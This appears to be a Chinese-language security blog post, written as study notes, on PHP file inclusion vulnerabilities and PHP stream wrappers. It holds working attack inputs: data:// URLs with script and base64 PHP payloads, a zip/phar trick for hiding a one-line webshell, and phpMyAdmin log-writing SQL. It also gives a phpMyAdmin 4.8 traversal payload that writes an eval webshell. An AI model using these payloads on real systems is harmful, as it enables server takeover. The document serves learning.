<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0,viewport-fit=cover"><title>任意文件包含漏洞 | Hexo</title><meta name="author" content="John Doe"><meta name="copyright" content="John Doe"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="文件包含（不是漏洞 是功能） 相同代码重复出现在不同文件 冗余 -&gt;文件包含 更高效 函数 include()  –临时加载引用  包含文件不存在 仍会往下执行 require()  –在运行php之前读取文件一起执行 包含文件不存在,停止 只包含一次： include_once() require_once() 1.php &lt;?phpecho &#39;a&#39;;?&gt; 2.">
<meta property="og:type" content="article">
<meta property="og:title" content="任意文件包含漏洞">
<meta property="og:url" content="http://example.com/2024/09/29/%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="文件包含（不是漏洞 是功能） 相同代码重复出现在不同文件 冗余 -&gt;文件包含 更高效 函数 include()  –临时加载引用  包含文件不存在 仍会往下执行 require()  –在运行php之前读取文件一起执行 包含文件不存在,停止 只包含一次： include_once() require_once() 1.php &lt;?phpecho &#39;a&#39;;?&gt; 2.">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://i.loli.net/2021/02/24/5O1day2nriDzjSu.png">
<meta property="article:published_time" content="2024-09-29T15:02:00.000Z">
<meta property="article:modified_time" content="2024-09-29T15:07:26.175Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/02/24/5O1day2nriDzjSu.png"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/2024/09/29/%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/index.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css?v=4.13.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.5.1/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0.33/dist/fancybox/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = {
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlight.js","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: 'Copy Successful',
    error: 'Copy Error',
    noSupport: 'Browser Not Supported'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  dateSuffix: {
    just: 'Just now',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  infinitegrid: {
    js: 'https://cdn.jsdelivr.net/npm/@egjs/infinitegrid@4.11.1/dist/infinitegrid.min.js',
    buttonText: 'Load More'
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: false,
  },
  autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: '任意文件包含漏洞',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2024-09-29 23:07:26'
}</script><script>(win=>{
      win.saveToLocal = {
        set: (key, value, ttl) => {
          if (ttl === 0) return
          const now = Date.now()
          const expiry = now + ttl * 86400000
          const item = {
            value,
            expiry
          }
          localStorage.setItem(key, JSON.stringify(item))
        },
      
        get: key => {
          const itemStr = localStorage.getItem(key)
      
          if (!itemStr) {
            return undefined
          }
          const item = JSON.parse(itemStr)
          const now = Date.now()
      
          if (now > item.expiry) {
            localStorage.removeItem(key)
            return undefined
          }
          return item.value
        }
      }
    
      win.getScript = (url, attr = {}) => new Promise((resolve, reject) => {
        const script = document.createElement('script')
        script.src = url
        script.async = true
        script.onerror = reject
        script.onload = script.onreadystatechange = function() {
          const loadState = this.readyState
          if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
          script.onload = script.onreadystatechange = null
          resolve()
        }

        Object.keys(attr).forEach(key => {
          script.setAttribute(key, attr[key])
        })

        document.head.appendChild(script)
      })
    
      win.getCSS = (url, id = false) => new Promise((resolve, reject) => {
        const link = document.createElement('link')
        link.rel = 'stylesheet'
        link.href = url
        if (id) link.id = id
        link.onerror = reject
        link.onload = link.onreadystatechange = function() {
          const loadState = this.readyState
          if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
          link.onload = link.onreadystatechange = null
          resolve()
        }
        document.head.appendChild(link)
      })
    
      win.activateDarkMode = () => {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = () => {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
        if (t === 'dark') activateDarkMode()
        else if (t === 'light') activateLightMode()
      
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
      const detectApple = () => {
        if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
          document.documentElement.classList.add('apple')
        }
      }
      detectApple()
    })(window)</script><meta name="generator" content="Hexo 7.3.0"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="https://i.loli.net/2021/02/24/5O1day2nriDzjSu.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">14</div></a><a href="/tags/"><div class="headline">Tags</div><div class="length-num">0</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">0</div></a></div><hr class="custom-hr"/></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header"><nav id="nav"><span id="blog-info"><a href="/" title="Hexo"><span class="site-name">Hexo</span></a></span><div id="menus"><div id="toggle-menu"><a class="site-page" href="javascript:void(0);"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">任意文件包含漏洞</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">Created</span><time class="post-meta-date-created" datetime="2024-09-29T15:02:00.000Z" title="Created 2024-09-29 23:02:00">2024-09-29</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">Updated</span><time class="post-meta-date-updated" datetime="2024-09-29T15:07:26.175Z" title="Updated 2024-09-29 23:07:26">2024-09-29</time></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="任意文件包含漏洞"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">Post Views:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><p>文件包含（不是漏洞 是功能）</p>
<p>相同代码重复出现在不同文件 冗余 -&gt;文件包含 更高效</p>
<h2 id="函数"><a href="#函数" class="headerlink" title="函数"></a>函数</h2><p> include()  –临时加载引用  包含文件不存在 仍会往下执行</p>
<p>require()  –在运行php之前读取文件一起执行 包含文件不存在,停止</p>
<p>只包含一次：</p>
<p>include_once()</p>
<p>require_once()</p>
<p>1.php</p>
<p><code>&lt;?php</code><br><code>echo &#39;a&#39;;</code><br><code>?&gt;</code></p>
<p>2.php</p>
<p><code>&lt;?php</code><br><code>echo &#39;aaaaaaaaaaaaa&lt;br/&gt;&#39;;</code></p>
<p><code>include(&#39;1.php&#39;);</code><br><code>echo &#39;       aaaaaaaaaaaaa   &#39;;</code><br><code>?&gt;</code></p>
<p>任意文件包含(漏洞) :可以通过目标包含**文件</p>
<p>危害：任意文件都可被当作php执行</p>
<p>RFI&#x2F;LFI -&gt;远程文件包含  本地文件包含</p>
<p>R –remote                 L–local</p>
<p>本地文件包含:要包含的文件必须在目标主机上</p>
<p>远程文件包含：无论文件在哪里只要能访问到 </p>
<p>​		php默认不开启  [开启 allow_url_include&#x3D;On  allow_url_fopen&#x3D;On]</p>
<p>​		allow_url_include:</p>
<p>​		是否允许includeI()和require()函数包含URL（HTTP，HTTPS）作为文件处理</p>
<p>​		allow_url_fopen:</p>
<p>​		是否允许将URL（HTTP，HTTPS等）作为文件打开处理</p>
<p>​		php伪协议</p>
<ul>
<li>文件包含支持的伪协议主要有：php:&#x2F;&#x2F;input、php:&#x2F;&#x2F;filter、data:&#x2F;&#x2F;、phar:&#x2F;&#x2F;、zip:&#x2F;&#x2F;等</li>
</ul>
<h2 id="php伪协议"><a href="#php伪协议" class="headerlink" title="*php伪协议"></a>*php伪协议</h2><h3 id="1-php"><a href="#1-php" class="headerlink" title="1.php:&#x2F;&#x2F;"></a>1.php:&#x2F;&#x2F;</h3><p><em>php:&#x2F;&#x2F; — 访问各个输入&#x2F;输出流（I&#x2F;O streams）</em></p>
<h4 id="1-1-php-input"><a href="#1-1-php-input" class="headerlink" title="1.1 php:&#x2F;&#x2F;input"></a>1.1 php:&#x2F;&#x2F;input</h4><ul>
<li>php:&#x2F;&#x2F;input：访问请求的原始数据的只读流。</li>
<li>注：当enctype&#x3D;”multipart&#x2F;form-data”时，php:&#x2F;&#x2F;input是无效的。</li>
</ul>
<h4 id="1-2php-output"><a href="#1-2php-output" class="headerlink" title="1.2php:&#x2F;&#x2F;output"></a>1.2php:&#x2F;&#x2F;output</h4><ul>
<li>php:&#x2F;&#x2F;output 只写的数据流</li>
<li>php:&#x2F;&#x2F;output允许你以 print 和 echo 一样的方式写入到输出缓冲区。</li>
</ul>
<p>​		所谓缓冲区就是，临时存放数据的地方。当我们重新访问时，它就会刷新；当我们修改文件中的内容时，它也会刷新自己的内容。</p>
<h4 id="1-3-php-filter"><a href="#1-3-php-filter" class="headerlink" title="1.3 php:&#x2F;&#x2F;filter"></a>1.3 php:&#x2F;&#x2F;filter</h4><ul>
<li>php:&#x2F;&#x2F;filter是一种元封装器，是PHP中特有的协议流，设计用于数据流打开时的筛选过滤应用，作用是作为一个“中间流”来处理其他流。</li>
<li>php:&#x2F;&#x2F;filter目标使用以下的参数作为它路径的一部分。复合过滤链能够在一个路径上指定。<br>resource&#x3D;&lt;要过滤的数据流&gt;	指定了你要筛选过滤的数据流。	必选<br>read&#x3D;&lt;读链的筛选列表&gt;	可以设定一个或多个过滤器名称，以管道符分隔	可选<br>write&#x3D;&lt;写链的筛选列表&gt;	可以设定一个或多个过滤器名称，以管道符分隔。	可选<br>&lt;；两个链的筛选列表&gt;	任何没有以 read&#x3D; 或 write&#x3D; 作前缀 的筛选器列表会视情况应用于读或写链。</li>
</ul>
<p>	</p>
<p>php:&#x2F;&#x2F;filter可用于读取包含有敏感信息的PHP等源⽂件，使用base64是为了防止被浏览器当作XML语言解析，导致出错。</p>
<p>如果是有中文的文件，就不好读取了。base64对中文支持并不友好，需要对中文进行编码之后再转base64</p>
<h4 id="1-4-其他php伪协议"><a href="#1-4-其他php伪协议" class="headerlink" title="1.4 其他php伪协议"></a>1.4 其他php伪协议</h4><p>php:&#x2F;&#x2F;stdin 只读协议</p>
<p> php:&#x2F;&#x2F;stdout php:&#x2F;&#x2F;stderr 只写协议</p>
<h3 id="2-file"><a href="#2-file" class="headerlink" title="2.file:&#x2F;&#x2F;"></a>2.file:&#x2F;&#x2F;</h3><ul>
<li>常用于读取本地文件</li>
</ul>
<h3 id="3-data"><a href="#3-data" class="headerlink" title="3.data:&#x2F;&#x2F;"></a>3.data:&#x2F;&#x2F;</h3><ul>
<li>data:&#x2F;&#x2F;伪协议，是数据流封装器，和php:&#x2F;&#x2F;相似，都是利用了流的概念，将原本的include的文件流重定向到了用户可控制的输入流中，简单来说就是执行文件的包含方法包含了你的输入流，通过包含你输入的payload来实现目的。</li>
</ul>
<p>格式：<code>?page=data://text/plain,&lt;script&gt;alert(document.cookie)&lt;/script&gt;</code></p>
<p><code>?page=data://,&lt;script&gt;alert(document.cookie)&lt;/script&gt;</code></p>
<p>如果对特殊字符进行了过滤，可以通过base64编码后再输入<br><code>?page=data://text/plain;base64,PD9waHAgZWNobyBwaHBpbmZvKCk7Pz4=</code></p>
<h3 id="4-phar"><a href="#4-phar" class="headerlink" title="4.phar:&#x2F;&#x2F;"></a>4.phar:&#x2F;&#x2F;</h3><p>php解压缩包的一个函数，不管后缀是什么，都当作压缩包来解压。</p>
<p>格式：<code>?file=phar://压缩包名/内部文件名</code></p>
<p>例：phar:&#x2F;&#x2F;x.zip&#x2F;x.php </p>
<p>步骤：写一个一句话木马shell.php，然后用zip协议压缩为shell.zip， 再将后缀改为png等其他格式</p>
<p>注：php 版本大于等于5.3.0，压缩包需要是zip协议压缩，rar不行，将木马文件压缩后，改为其他任意格式的文件都可以正常使用。</p>
<h3 id="5-zip"><a href="#5-zip" class="headerlink" title="5.zip:&#x2F;&#x2F;"></a>5.zip:&#x2F;&#x2F;</h3><p>格式：<code>?file=zip://[压缩文件绝对路径]#[压缩文件内子文件名]</code></p>
<p>php&gt;&#x3D;5.3.0 （windows下5.3.0&lt;php&lt;5.4）</p>
<p>#在浏览器中编码为%23  浏览器默认不会传输特殊字符</p>
<h2 id="小tips"><a href="#小tips" class="headerlink" title="小tips"></a>小tips</h2><p>1.路径判断</p>
<p>sadhjb&#x2F;..&#x2F;   当前目录</p>
<p>cmd中的路径可包含特殊字符(除&amp;和中文字符   &amp;表示几条命令同时执行)</p>
<p>php中路径不可包含特殊字符</p>
<p>2.XX::xxxx php调用类里的方法</p>
<p>3.GET传参原本会url解码一次</p>
<h2 id="PHPMYADMIN"><a href="#PHPMYADMIN" class="headerlink" title="PHPMYADMIN"></a>PHPMYADMIN</h2><h3 id="高权限-日志写shell法"><a href="#高权限-日志写shell法" class="headerlink" title="高权限:日志写shell法"></a>高权限:日志写shell法</h3><p>​	1.路径 不知道网站根目录没办法</p>
<p>​	2.没有root权限 没法设置</p>
<p>general_log 开启</p>
<p>general_log_file </p>
<p>1.查看general log是否开启</p>
<p>show variables like ‘%general%’;</p>
<p>2.打开general_log日志读写功能</p>
<p>SET global general_log&#x3D;‘on’; </p>
<p>3.写shell，会把执行的语句写到shell.php，然后我们查询一下</p>
<p>SET GLOBAL general_log_file&#x3D;‘C:&#x2F;&#x2F;phpStudy&#x2F;&#x2F;PHPTutorial&#x2F;&#x2F;WWW&#x2F;&#x2F;shell.php’;</p>
<h3 id="文件包含法-phpmyadmin-4-8及其以下存在的漏洞"><a href="#文件包含法-phpmyadmin-4-8及其以下存在的漏洞" class="headerlink" title="文件包含法(phpmyadmin 4.8及其以下存在的漏洞)"></a>文件包含法(phpmyadmin 4.8及其以下存在的漏洞)</h3><p>​	1.无权限 </p>
<p>​	2.无路径要求</p>
<p>​	代码审计 include require 找可控的地方</p>
<p>​     例 <code>?target=da.php%253Faa/../../../../../../../../../数据库表的路径&amp;8=phpinfo();</code>      多写几个..&#x2F;跳出</p>
<p>​	datadir找数据库的存储路径 建表(字段搞一句话木马)</p>
<p><code>?target=da.php%253Faa/../../../../../../../../../数据库表的路径&amp;8=phpinfo();</code> 此时菜刀连接会报错 需要登录</p>
<p><code>?target=da.php%253Faa/../../../../../../../../../数据库表的路径&amp;8=file_put_contents(&#39;zry.php&#39;,&#39;&lt;?php eval($_GET[8])?&gt;;&#39;)</code>  –写出的文件就在当前目录</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta"><i class="fas fa-circle-user fa-fw"></i>Author: </span><span class="post-copyright-info"><a href="http://example.com">John Doe</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta"><i class="fas fa-square-arrow-up-right fa-fw"></i>Link: </span><span class="post-copyright-info"><a href="http://example.com/2024/09/29/%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/">http://example.com/2024/09/29/%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta"><i class="fas fa-circle-exclamation fa-fw"></i>Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="tag_share"><div class="post-meta__tag-list"></div><div class="post_share"><div class="social-share" data-image="https://i.loli.net/2021/02/24/5O1day2nriDzjSu.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1.1.3/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1.1.3/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2024/09/29/%E6%94%AF%E4%BB%98%E3%80%81%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E/" title="支付、越权漏洞"><div class="cover" style="background: var(--default-bg-color)"></div><div class="pagination-info"><div class="label">Previous</div><div class="prev_info">支付、越权漏洞</div></div></a></div><div class="next-post pull-right"><a href="/2024/09/29/%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" title="代码执行漏洞"><div class="cover" style="background: var(--default-bg-color)"></div><div class="pagination-info"><div class="label">Next</div><div class="next_info">代码执行漏洞</div></div></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="https://i.loli.net/2021/02/24/5O1day2nriDzjSu.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">John Doe</div><div class="author-info__description"></div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">14</div></a><a href="/tags/"><div class="headline">Tags</div><div class="length-num">0</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">0</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>Announcement</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>Contents</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%87%BD%E6%95%B0"><span class="toc-number">1.</span> <span class="toc-text">函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#php%E4%BC%AA%E5%8D%8F%E8%AE%AE"><span class="toc-number">2.</span> <span class="toc-text">*php伪协议</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-php"><span class="toc-number">2.1.</span> <span class="toc-text">1.php:&#x2F;&#x2F;</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-1-php-input"><span class="toc-number">2.1.1.</span> <span class="toc-text">1.1 php:&#x2F;&#x2F;input</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-2php-output"><span class="toc-number">2.1.2.</span> <span class="toc-text">1.2php:&#x2F;&#x2F;output</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-3-php-filter"><span class="toc-number">2.1.3.</span> <span class="toc-text">1.3 php:&#x2F;&#x2F;filter</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-4-%E5%85%B6%E4%BB%96php%E4%BC%AA%E5%8D%8F%E8%AE%AE"><span class="toc-number">2.1.4.</span> <span class="toc-text">1.4 其他php伪协议</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-file"><span class="toc-number">2.2.</span> <span class="toc-text">2.file:&#x2F;&#x2F;</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-data"><span class="toc-number">2.3.</span> <span class="toc-text">3.data:&#x2F;&#x2F;</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-phar"><span class="toc-number">2.4.</span> <span class="toc-text">4.phar:&#x2F;&#x2F;</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-zip"><span class="toc-number">2.5.</span> <span class="toc-text">5.zip:&#x2F;&#x2F;</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%8Ftips"><span class="toc-number">3.</span> <span class="toc-text">小tips</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHPMYADMIN"><span class="toc-number">4.</span> <span class="toc-text">PHPMYADMIN</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%AB%98%E6%9D%83%E9%99%90-%E6%97%A5%E5%BF%97%E5%86%99shell%E6%B3%95"><span class="toc-number">4.1.</span> <span class="toc-text">高权限:日志写shell法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%B3%95-phpmyadmin-4-8%E5%8F%8A%E5%85%B6%E4%BB%A5%E4%B8%8B%E5%AD%98%E5%9C%A8%E7%9A%84%E6%BC%8F%E6%B4%9E"><span class="toc-number">4.2.</span> <span class="toc-text">文件包含法(phpmyadmin 4.8及其以下存在的漏洞)</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>Recent Post</span></div><div class="aside-list"><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2025/04/15/web%E6%94%BB%E9%98%B2/" title="Untitled">Untitled</a><time datetime="2025-04-15T15:42:20.746Z" title="Created 2025-04-15 23:42:20">2025-04-15</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2025/02/05/ctfshow%E9%9D%B6%E5%9C%BA/" title="ctfshow靶场">ctfshow靶场</a><time datetime="2025-02-05T02:30:23.000Z" title="Created 2025-02-05 10:30:23">2025-02-05</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2024/10/16/CTFTools/" title="CTFTools">CTFTools</a><time datetime="2024-10-16T11:43:16.000Z" title="Created 2024-10-16 19:43:16">2024-10-16</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2024/10/13/csrf/" title="csrf">csrf</a><time datetime="2024-10-13T05:26:57.000Z" title="Created 2024-10-13 13:26:57">2024-10-13</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2024/09/29/%E6%94%AF%E4%BB%98%E3%80%81%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E/" title="支付、越权漏洞">支付、越权漏洞</a><time datetime="2024-09-29T15:02:16.000Z" title="Created 2024-09-29 23:02:16">2024-09-29</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2025 By John Doe</div><div class="framework-info"><span>Framework </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Read Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Toggle Between Light And Dark Mode"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="Toggle between Single-column and Double-column"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside-config" type="button" title="Setting"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table Of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back To Top"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js?v=4.13.0"></script><script src="/js/main.js?v=4.13.0"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0.33/dist/fancybox/fancybox.umd.min.js"></script><div class="js-pjax"></div><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>